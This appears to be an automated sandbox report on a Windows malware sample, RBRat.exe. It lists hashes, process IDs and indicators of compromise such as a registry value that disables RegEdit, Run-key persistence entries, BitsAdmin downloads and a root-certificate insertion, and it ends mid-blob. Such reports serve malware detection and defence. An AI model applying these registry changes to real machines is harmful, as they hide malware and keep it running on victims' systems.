a615c1b27a5c74a73281eb46e0ba7aa7427c05f41f24aac189f8bf2fd7f6cbf1

Analysis

max time kernel
1796s
max time network
1794s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
01-09-2023 09:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RBRat.exe
Size

689KB
MD5

f0cb80486ef6b557926c70e38deed7d7
SHA1

8a462ea003c6d8e8ad63b2ab519485327395dfdc
SHA256

a615c1b27a5c74a73281eb46e0ba7aa7427c05f41f24aac189f8bf2fd7f6cbf1
SHA512

e733eb81a2bf89dd9c06b9994b578f2af45ea038e02e1400da13f0813e1674bec8778392608ba465a0f78d9c7e66557ca1cc6b195b5b39a783df6174753b2a95
SSDEEP

12288:qubsNSOetfARQAPyGUfT+tkr5X6nb3+noe9OJFc1pv79/kAxD7hZnMn:qubsnafAPyjZr5X6qofFcTGAB7U

Score

8^/10

evasion persistence upx

Malware Config

Signatures

Disables RegEdit via registry modification 48 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	server.exe

Executes dropped EXE 51 IoCs

pid	Process
1504	OnlineClient.exe
2752	setup.exe
2980	tasklist.exe
2616	server.exe
2044	server.exe
1840	server.exe
1784	server.exe
1152	server.exe
1644	server.exe
1824	server.exe
2664	server.exe
2808	server.exe
2712	server.exe
2544	server.exe
2380	server.exe
872	server.exe
2564	server.exe
1328	server.exe
2612	server.exe
2804	server.exe
1516	server.exe
1756	server.exe
1648	server.exe
1728	server.exe
2244	server.exe
2840	server.exe
2532	server.exe
2484	server.exe
2816	server.exe
1076	server.exe
2596	server.exe
2964	server.exe
2368	server.exe
2004	server.exe
1724	server.exe
2840	server.exe
2756	server.exe
904	server.exe
1688	server.exe
2608	server.exe
1652	server.exe
2728	server.exe
2620	server.exe
2120	server.exe
1528	server.exe
2956	server.exe
740	server.exe
1828	server.exe
2808	server.exe
2328	server.exe
1596	server.exe

Loads dropped DLL 60 IoCs

pid	Process
2604	RBRat.exe
2604	RBRat.exe
2604	RBRat.exe
2604	RBRat.exe
2604	RBRat.exe
2604	RBRat.exe
2752	setup.exe
2752	setup.exe
2752	setup.exe
2752	setup.exe
2752	setup.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe
2884	cmd.exe

UPX packed file 11 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000900000001612c-65.dat	upx
behavioral1/files/0x000900000001612c-63.dat	upx
behavioral1/files/0x000900000001612c-60.dat	upx
behavioral1/files/0x000900000001612c-56.dat	upx
behavioral1/files/0x000900000001612c-55.dat	upx
behavioral1/files/0x000900000001612c-53.dat	upx
behavioral1/memory/2752-70-0x0000000002000000-0x0000000002010000-memory.dmp	upx
behavioral1/memory/2752-71-0x0000000002000000-0x0000000002010000-memory.dmp	upx
behavioral1/files/0x000900000001612c-72.dat	upx
behavioral1/memory/2980-73-0x0000000000400000-0x0000000000410000-memory.dmp	upx
behavioral1/memory/2980-157-0x0000000000400000-0x0000000000410000-memory.dmp	upx

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Run\OnlineClient = "C:\\online.bat"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsTaskList = "C:\\WINNT\\tasklist.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
2428	timeout.exe
2432	timeout.exe
1776	timeout.exe
2224	timeout.exe
328	timeout.exe
1692	timeout.exe
2156	timeout.exe
2392	timeout.exe
2244	timeout.exe
2152	timeout.exe
2348	timeout.exe
2192	timeout.exe
2452	timeout.exe
1552	timeout.exe
1952	timeout.exe
1500	timeout.exe
1160	timeout.exe
904	timeout.exe
2556	timeout.exe
2388	timeout.exe
272	timeout.exe
672	timeout.exe
2452	timeout.exe
2996	timeout.exe
2448	timeout.exe
2232	timeout.exe
1076	timeout.exe
2584	timeout.exe
2540	timeout.exe
2196	timeout.exe
1808	timeout.exe
884	timeout.exe
616	timeout.exe
2836	timeout.exe
2152	timeout.exe
2872	timeout.exe
2616	timeout.exe
2092	timeout.exe
2876	timeout.exe
2784	timeout.exe
2236	timeout.exe
2816	timeout.exe
2696	timeout.exe
2132	timeout.exe
320	timeout.exe
616	timeout.exe
2100	timeout.exe
1824	timeout.exe
1980	timeout.exe
1648	timeout.exe
1088	timeout.exe
2556	timeout.exe
2348	timeout.exe
2872	timeout.exe
1640	timeout.exe
2116	timeout.exe
1264	timeout.exe
2232	timeout.exe
1160	timeout.exe
684	timeout.exe
1788	timeout.exe
1752	timeout.exe
2156	timeout.exe
1604	timeout.exe

Download via BitsAdmin 1 TTPs 48 IoCs

dropper

BITS Jobs

T1197

pid	Process
2120	bitsadmin.exe
2700	bitsadmin.exe
2968	bitsadmin.exe
824	bitsadmin.exe
2036	bitsadmin.exe
2444	bitsadmin.exe
2280	bitsadmin.exe
1804	bitsadmin.exe
1244	bitsadmin.exe
2996	bitsadmin.exe
1136	bitsadmin.exe
1676	bitsadmin.exe
2924	bitsadmin.exe
1460	bitsadmin.exe
2060	bitsadmin.exe
1516	bitsadmin.exe
2444	bitsadmin.exe
1600	bitsadmin.exe
2620	bitsadmin.exe
2468	bitsadmin.exe
1080	bitsadmin.exe
1268	bitsadmin.exe
2024	bitsadmin.exe
2660	bitsadmin.exe
2384	bitsadmin.exe
272	bitsadmin.exe
756	bitsadmin.exe
2148	bitsadmin.exe
2648	bitsadmin.exe
2568	bitsadmin.exe
2844	bitsadmin.exe
1528	bitsadmin.exe
1044	bitsadmin.exe
2224	bitsadmin.exe
2704	bitsadmin.exe
1244	bitsadmin.exe
2640	bitsadmin.exe
2432	bitsadmin.exe
2448	bitsadmin.exe
1060	bitsadmin.exe
2496	bitsadmin.exe
2004	bitsadmin.exe
2160	bitsadmin.exe
1772	bitsadmin.exe
2620	bitsadmin.exe
2248	bitsadmin.exe
2464	bitsadmin.exe
2820	bitsadmin.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
2980	tasklist.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
2328	taskkill.exe
2892	taskkill.exe
1944	taskkill.exe
1244	taskkill.exe
2532	taskkill.exe
740	taskkill.exe
2076	taskkill.exe
2676	taskkill.exe
2664	taskkill.exe
1248	taskkill.exe
1724	taskkill.exe
740	taskkill.exe
1628	taskkill.exe
2776	taskkill.exe
1956	taskkill.exe
2292	taskkill.exe
2108	taskkill.exe
1780	taskkill.exe
852	taskkill.exe
2684	taskkill.exe
1196	taskkill.exe
2804	taskkill.exe
2204	taskkill.exe
188	taskkill.exe
3004	taskkill.exe
2872	taskkill.exe
2760	taskkill.exe
1808	taskkill.exe
1448	taskkill.exe
1140	taskkill.exe
736	taskkill.exe
2660	taskkill.exe
328	taskkill.exe
2156	taskkill.exe
2772	taskkill.exe
3004	taskkill.exe
328	taskkill.exe
2388	taskkill.exe
2700	taskkill.exe
2688	taskkill.exe
2184	taskkill.exe
2784	taskkill.exe
2140	taskkill.exe
2292	taskkill.exe
2584	taskkill.exe
1016	taskkill.exe
2340	taskkill.exe
3008	taskkill.exe
1864	taskkill.exe
908	taskkill.exe
1780	taskkill.exe
1708	taskkill.exe
2404	taskkill.exe
1876	taskkill.exe
2456	taskkill.exe
1268	taskkill.exe
2392	taskkill.exe
2952	taskkill.exe
2512	taskkill.exe
1088	taskkill.exe
2332	taskkill.exe
2728	taskkill.exe
2468	taskkill.exe
1540	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{C327AF21-48AD-11EE-9BFA-76A8121F2E0E} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a0cdf399badcd901	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000008c66dacf3255794896cbcb5ac20a7140000000000200000000001066000000010000200000004a71c9b96592ccc17342663079f9ac70e1f7e290e97f4c31bbac60db2af94a41000000000e8000000002000020000000b75fd978a70635d60737f57bfef10f9ac3f73b523c8bafae60bdafa51850d67620000000e9fcea35c07c32647e3dc2e05ed21d15d161b6ee52b841546789222465def7104000000058613811c0203f731c4bceb93b99e200c3c1d53254586c7fa34a066af5132f06bc38991ce9494946bf57bd6743003aeef2ed4894d86eeb1f582abd4202f38359	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000008c66dacf3255794896cbcb5ac20a7140000000000200000000001066000000010000200000005f89e295adfd4619c1c9d7ac067f604fc774775a07d09da181f0c1fa8e2aeb92000000000e8000000002000020000000a011e98c577f58af901e0497c7d9b5e27b38e775a7f0103d880f100b1db31ccc900000009605d18473c1e7466f17539539dcb5981a6a78bf81d37cc114101079991bb270d6f59c27776a5f33fbe12260f76809493edbad875948c9693d69f092e64ab2b39faf471196f4abdeed1e3fa808bb23dd58c73b98b009acd7418ea369acfea8a0898e9dabe9945a885dae51c2bfc4fa977d6e79970c4c26d633d8333d47bc5a712ed46000a4a0e9db612dff37e570dcda40000000967e1f12dab3a8e91a92adbaa64ef422140008709f212ca4a7cb1338895c5361239cdeff0caceb5f92bdb4c6aef2070e17ba509a50db075d3161cd2b8affb061	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
2512	reg.exe
1840	reg.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	server.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	server.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf